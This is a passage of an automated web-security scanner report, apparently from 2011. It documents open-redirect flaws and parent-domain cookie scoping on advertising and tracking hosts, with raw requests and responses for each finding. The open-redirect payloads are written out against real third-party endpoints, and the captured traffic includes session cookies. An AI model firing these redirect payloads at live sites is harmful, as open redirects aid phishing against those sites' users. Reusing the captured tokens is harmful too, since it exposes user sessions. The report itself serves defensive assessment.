GET /click%3Bh%3Dv8/3b09/f/8c/%2a/j%3B232796950%3B0-0%3B0%3B56677086%3B3454-728/90%3B38609320/38627077/1%3Bu%3D17918465%3B~sscs%3D%3fhttp://.a7d6d1ac935dd610b//bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://.a7d6d1ac935dd610b//bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=http:%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static
Date: Mon, 16 May 2011 01:43:55 GMT
Server: GFE/2.0
Content-Type: text/html

14.4. http://b.scorecardresearch.com/r [d.c parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a64830d9ddb512cd7/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

http://a64830d9ddb512cd7/a?gif

Request

GET /r?c2=6035140&d.c=http%3a//a64830d9ddb512cd7/a%3fgif&d.o=wdgdsec&d.x=21412094&d.t=page&d.u=http%3A%2F%2Fdisneycruise.disney.go.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a64830d9ddb512cd7/a?gif
Date: Mon, 16 May 2011 01:29:00 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:29:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

14.5. http://bh.contextweb.com/bh/rtset [rurl parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//ac0ccb34eb9b5804f/a%3fhttp%3a//d.chango.com/m/s/contextweb was submitted in the rurl parameter. This caused a redirection to the following URL:

http://ac0ccb34eb9b5804f/a?http://d.chango.com/m/s/contextweb

Request

GET /bh/rtset?do=add&ev=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4&pid=535495&rurl=http%3a//ac0ccb34eb9b5804f/a%3fhttp%3a//d.chango.com/m/s/contextweb&x=2011-06-29 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw; V=8vciuQJMXXJY; 526735_4_81610=1305508795680; cr=355|1|-8588954932899850418|1; vf=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:26:26 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0; Domain=.contextweb.com; Expires=Tue, 15-May-2012 01:26:26 GMT; Path=/
Location: http://ac0ccb34eb9b5804f/a?http://d.chango.com/m/s/contextweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 16 May 2011 01:26:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

14.6. http://i.w55c.net/ping_match.gif [rurl parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//a763ba70336584003/a%3fhttp%3a//image2.pubmatic.com/AdServer/Pug%3fvcode%3dbz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw was submitted in the rurl parameter. This caused a redirection to the following URL:

http://a763ba70336584003/a?http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw

Request

GET /ping_match.gif?ei=PUBMATIC&rurl=http%3a//a763ba70336584003/a%3fhttp%3a//image2.pubmatic.com/AdServer/Pug%3fvcode%3dbz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Wed, 15-May-13 01:21:23 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Location: http://a763ba70336584003/a?http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0

14.7. http://p.brilig.com/contact/bct [REDIR parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The value of the REDIR request parameter is used to perform an HTTP redirect. The payload .ace303c9612d378c9/ was submitted in the REDIR parameter. This caused a redirection to the following URL:

http://.ace303c9612d378c9/&external_user_id=1&_m=1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=d96a784e-8901-47de-9dd1-4f91acb31514&REDIR=.ace303c9612d378c9/&external_user_id=1&_m=1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/plain
Date: Mon, 16 May 2011 01:25:21 GMT
Expires: Mon, 19 Dec 1983 01:25:21 GMT
Location: http://.ace303c9612d378c9/&external_user_id=1&_m=1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 08-May-2041 01:25:21 GMT
X-Brilig-D: D=3120
Content-Length: 0
Connection: keep-alive

14.8. http://pixel.invitemedia.com/pubmatic_sync [pubmatic_callback parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/pubmatic_sync

Issue detail

The value of the pubmatic_callback request parameter is used to perform an HTTP redirect. The payload http%3a//a730fdf10bea4fa87/a%3fhttp%3a//image2.pubmatic.com/AdServer/Pug%3fvcode%3dbz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3d was submitted in the pubmatic_callback parameter. This caused a redirection to the following URL:

http://a730fdf10bea4fa87/a?http%3A%2F%2Fimage2.pubmatic.com%2FAdServer%2FPug%3Fvcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&piggybackCookie=09035c0c-59c0-487e-ac6a-85a606e2b1c1.22328.18842.49076.13450.

Request

GET /pubmatic_sync?pubmatic_callback=http%3a//a730fdf10bea4fa87/a%3fhttp%3a//image2.pubmatic.com/AdServer/Pug%3fvcode%3dbz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3d&piggybackCookie= HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exchange_uid="eyI0IjogWyJDQUVTRUJMNlFmRmRPWkJGdXdLdHI0bVhjeWMiLCA3MzQyNzJdfQ=="; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; segments_p1="eJzjYuGYNZmRi4VjxzoQueU/ExczR1cmADyqBZU="

Response

HTTP/1.0 302 Found
Server: IM BidManager
Date: Mon, 16 May 2011 01:19:52 GMT
Expires: Mon, 16-May-2011 01:19:32 GMT
Location: http://a730fdf10bea4fa87/a?http%3A%2F%2Fimage2.pubmatic.com%2FAdServer%2FPug%3Fvcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&piggybackCookie=09035c0c-59c0-487e-ac6a-85a606e2b1c1.22328.18842.49076.13450.
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/plain

14.9. http://r.nexac.com/e/getdata.xgi [ru parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//ab6f780051a3efd99/a%3fhttp%3a//m.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d%26ssv_dx_1%3d<na_da>%26ssv_dx_2%3d<na_mp>%26ssv_dx_3%3d<na_id> was submitted in the ru parameter. This caused a redirection to the following URL:

http://ab6f780051a3efd99/a?http://m.xp1.ru4.com/meta?_o=65121&_t=dx&ssv_duid=&ssv_dx_1=&ssv_dx_2=&ssv_dx_3=

Request

GET /e/getdata.xgi?dt=br&pkey=vrie89u2mpteq&ru=http%3a//ab6f780051a3efd99/a%3fhttp%3a//m.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d%26ssv_dx_1%3d<na_da>%26ssv_dx_2%3d<na_mp>%26ssv_dx_3%3d<na_id> HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Location: http://ab6f780051a3efd99/a?http://m.xp1.ru4.com/meta?_o=65121&_t=dx&ssv_duid=&ssv_dx_1=&ssv_dx_2=&ssv_dx_3=
Content-type: text/html
Date: Mon, 16 May 2011 01:20:05 GMT
Server: lighttpd/1.4.18
Content-Length: 1

14.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://s.ixiaa.com
Path:	/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif

Issue detail

The value of the &redirect request parameter is used to perform an HTTP redirect. The payload http%3a//acc0cdbab0fd100dc/a%3fhttp%3a//tags.bluekai.com/site/3754%3fphint%3dea%25253D%257BEA_value%257D%26phint%3deb%25253D%257BEB_value%257D%26phint%3dec%25253D%257BEC_value%257D%26phint%3ded%25253D%257BED_value%257D%26phint%3dee%25253D%257BEE_value%257D%26phint%3daa%25253D%257BEE_value%257D%26phint%3dab%25253D%257BEE_value%257D%26phint%3dac%25253D%257BEE_value%257D%26phint%3day%25253D%257BEE_value%257D%26phint%3daz%25253D%257BEE_value%257D%26ret%3dhtml%26id%3dPARTNER_UUID was submitted in the &redirect parameter. This caused a redirection to the following URL:

http://acc0cdbab0fd100dc/a?http://tags.bluekai.com/site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&phint=aa%3DNA&phint=ab%3DNA&phint=ac%3DNA&phint=ay%3DNA&phint=az%3DNA&ret=html&id=PARTNER_UUID

Request

GET /digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3a//acc0cdbab0fd100dc/a%3fhttp%3a//tags.bluekai.com/site/3754%3fphint%3dea%25253D%257BEA_value%257D%26phint%3deb%25253D%257BEB_value%257D%26phint%3dec%25253D%257BEC_value%257D%26phint%3ded%25253D%257BED_value%257D%26phint%3dee%25253D%257BEE_value%257D%26phint%3daa%25253D%257BEE_value%257D%26phint%3dab%25253D%257BEE_value%257D%26phint%3dac%25253D%257BEE_value%257D%26phint%3day%25253D%257BEE_value%257D%26phint%3daz%25253D%257BEE_value%257D%26ret%3dhtml%26id%3dPARTNER_UUID HTTP/1.1
Host: s.ixiaa.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut:%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&phint=__bk_k%3dApply%20for%20Credit,%20Low%20Monthly%20Payments,%20Apparel,%20Electronics,%20Bed,%20Bath,%20Toys,%20Video%20Games,%20MP3%20Players,%20Home%20Furnishings&limit=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 16 May 2011 01:39:30 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://acc0cdbab0fd100dc/a?http://tags.bluekai.com/site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&phint=aa%3DNA&phint=ab%3DNA&phint=ac%3DNA&phint=ay%3DNA&phint=az%3DNA&ret=html&id=PARTNER_UUID
X-ClientIP: 173.193.214.243
Content-Length: 3

...

14.11. http://sync.mathtag.com/sync/img [redir parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//aa2ac0a4f56b5cd42/a%3fhttp%3a//bh.contextweb.com/bh/rtset%3fdo%3dadd%26pid%3d530739%26ev%3d[MM_UUID] was submitted in the redir parameter. This caused a redirection to the following URL:

http://aa2ac0a4f56b5cd42/a?http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dd07bc8-e97b-118c-3dec-7b8c5c306530

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3a//aa2ac0a4f56b5cd42/a%3fhttp%3a//bh.contextweb.com/bh/rtset%3fdo%3dadd%26pid%3d530739%26ev%3d[MM_UUID] HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305508808

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7852 30802
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:28:24 GMT
Location: http://aa2ac0a4f56b5cd42/a?http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305509304; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:28:24 GMT
Content-Length: 0

15. Cookie scoped to parent domain previous next
There are 81 instances of this issue:

http://eval.bizrate.com/js/survey_126457_1.js
http://sony.links.origin.channelintelligence.com/pages/wl.asp
http://ttwbs.channelintelligence.com/
http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5
http://a.tribalfusion.com/j.ad
http://action.media6degrees.com/orbserv/hbpix
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://admeld.adnxs.com/usersync
http://ads.revsci.net/adserver/ako
http://adserver.veruta.com/track.fcgi
http://ak1.abmr.net/is/images3.pacsun.com
http://ak1.abmr.net/is/tag.admeld.com
http://ak1.abmr.net/is/tag.contextweb.com
http://ak1.abmr.net/is/www.imiclk.com
http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://c7.zedo.com/utils/ecSet.js
http://cw-m.d.chango.com/m/cw
http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000
http://data.adsrvr.org/map/cookie/contextweb
http://disneycruise.disney.go.com/reservations/customize
http://f.nexac.com/e/a-677/s-2140.xgi
http://https.edge.ru4.com/smartserve/ad
http://i.w55c.net/ping_match.gif
http://ib.adnxs.com/getuid
http://ib.adnxs.com/getuidnb
http://ib.adnxs.com/seg
http://id.google.com/verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif
http://id.google.com/verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif
http://id.google.com/verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif
http://idcs.interclick.com/Segment.aspx
http://idpix.media6degrees.com/orbserv/hbpix
http://image2.pubmatic.com/AdServer/Pug
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://media.fastclick.net/w/tre
http://odb.outbrain.com/utils/get
http://odb.outbrain.com/utils/ping.html
http://optimized-by.rubiconproject.com/a/dk.js
http://p.brilig.com/contact/bct
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js
http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js
http://pix04.revsci.net/J06575/a4/0/0/pcx.js
http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js
http://pixel.33across.com/ps/
http://pixel.invitemedia.com/data_sync
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF
http://r.turn.com/server/pixel.htm
http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1
http://segment-pixel.invitemedia.com/pixel
http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css
http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
http://sync.mathtag.com/sync/img
http://t.invitemedia.com/track_imp
http://tag.contextweb.com/TagPublish/getad.aspx
http://tags.bluekai.com/site/2948
http://tags.bluekai.com/site/3358
http://www.imiclk.com/cgi/r.cgi
http://www.mcafeesecure.com/ads/1002/25
http://www.passporterboards.com/forums/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

15.1. http://eval.bizrate.com/js/survey_126457_1.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://eval.bizrate.com
Path:	/js/survey_126457_1.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:43:14 GMT; Path=/
br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:43:14 GMT; Path=/
_data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:43:14 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/survey_126457_1.js HTTP/1.1
Host: eval.bizrate.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:43:14 GMT; Path=/
Set-Cookie: br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:43:14 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:43:14 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 16 May 2011 01:43:13 GMT
Content-Length: 16130

<!-- // hide script
var BIZRATE = {
init:function() {
this.mid = '126457';
this.type = 1;
if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) {

...[SNIP]...

15.2. http://sony.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sony.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sessionstamp=1186043; expires=Sun, 15-May-2011 21:26:46 GMT; domain=.channelintelligence.com; path=/
serverstamp=4B88CCEA%2D94CF%2DAEFC%2D64AD%2D028BB2019E0D; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=134145602&nICnt=1&nDCnt=2&nRGID=1864&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=98285&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=11302_11303&nRID=0&sRnd=B5FFQhb0 HTTP/1.1
Host: sony.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://sony.links.channelintelligence.com/pages/prices.asp?nrgid=1864&ssku=98285
